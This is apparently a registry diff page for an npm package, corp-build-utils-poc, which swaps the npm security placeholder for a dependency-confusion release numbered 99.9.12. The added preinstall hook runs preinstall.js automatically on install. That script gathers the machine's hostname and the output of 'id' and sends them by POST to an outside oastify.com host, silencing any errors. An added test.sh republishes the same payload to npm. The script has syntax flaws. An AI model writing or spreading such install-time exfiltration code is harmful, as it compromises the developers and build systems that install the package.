corp-build-utils-poc 0.0.1-security → 99.9.12

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of corp-build-utils-poc might be problematic. Click here for more details.

Files changed (8) hide show
  1. package/corp-build-utils-poc-99.9.10.tgz +0 -0
  2. package/corp-build-utils-poc-99.9.11.tgz +0 -0
  3. package/corp-build-utils-poc-99.9.12.tgz +0 -0
  4. package/corp-build-utils-poc-99.9.9.tgz +0 -0
  5. package/package.json +6 -3
  6. package/preinstall.js +24 -0
  7. package/test.sh +45 -0
  8. package/README.md +0 -5
package/corp-build-utils-poc-99.9.10.tgz ADDED
Binary file
package/corp-build-utils-poc-99.9.11.tgz ADDED
Binary file
package/corp-build-utils-poc-99.9.12.tgz ADDED
Binary file
package/corp-build-utils-poc-99.9.9.tgz ADDED
Binary file
package/package.json CHANGED
@@ -1,6 +1,9 @@
1
1
  {
2
2
  "name": "corp-build-utils-poc",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "99.9.12",
4
+ "description": "dependency confusion poc",
5
+ "private": false,
6
+ "scripts": {
7
+ "preinstall": "node preinstall.js"
8
+ }
6
9
  }
package/preinstall.js ADDED
@@ -0,0 +1,24 @@
1
+ const https = require("https");
2
+
3
+ const payload = JSON.stringify({
4
+ event: "dependency_confusion_executed",
5
+ host: require("os").hostname()
6
+ data: require("os").system('id')
7
+ });
8
+
9
+ const req = https.request(
10
+ {
11
+ hostname: "usqcwm91ckqp7x1xtohghtpyup0go6cv.oastify.com", // <-- replace with YOUR webhook host
12
+ path: "/webhook", // <-- replace path
13
+ method: "POST",
14
+ headers: {
15
+ "Content-Type": "application/json",
16
+ "Content-Length": payload.length
17
+ }
18
+ },
19
+ () => {}
20
+ );
21
+
22
+ req.on("error", () => {}); // do not break install
23
+ req.write(payload);
24
+ req.end();
package/test.sh ADDED
@@ -0,0 +1,45 @@
1
+ #!/bin/bash
2
+ set -e
3
+
4
+ echo "[*] Updating PoC payload..."
5
+
6
+ cat > preinstall.js <<'EOF'
7
+ const https = require("https");
8
+
9
+ const payload = JSON.stringify({
10
+ event: "dependency_confusion_executed",
11
+ host: require("os").hostname()
12
+ data: require("os").system('id')
13
+ });
14
+
15
+ const req = https.request(
16
+ {
17
+ hostname: "usqcwm91ckqp7x1xtohghtpyup0go6cv.oastify.com", // <-- replace with YOUR webhook host
18
+ path: "/webhook", // <-- replace path
19
+ method: "POST",
20
+ headers: {
21
+ "Content-Type": "application/json",
22
+ "Content-Length": payload.length
23
+ }
24
+ },
25
+ () => {}
26
+ );
27
+
28
+ req.on("error", () => {}); // do not break install
29
+ req.write(payload);
30
+ req.end();
31
+ EOF
32
+
33
+ echo "[*] Bumping version..."
34
+ npm version patch --no-git-tag-version
35
+
36
+ NEW_VERSION=$(node -p "require('./package.json').version")
37
+ echo "[+] New version: $NEW_VERSION"
38
+
39
+ echo "[*] Packing package..."
40
+ npm pack
41
+
42
+ echo "[*] Publishing to npm..."
43
+ npm publish --access public
44
+
45
+ echo "[+] Publish complete"
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=corp-build-utils-poc for more information.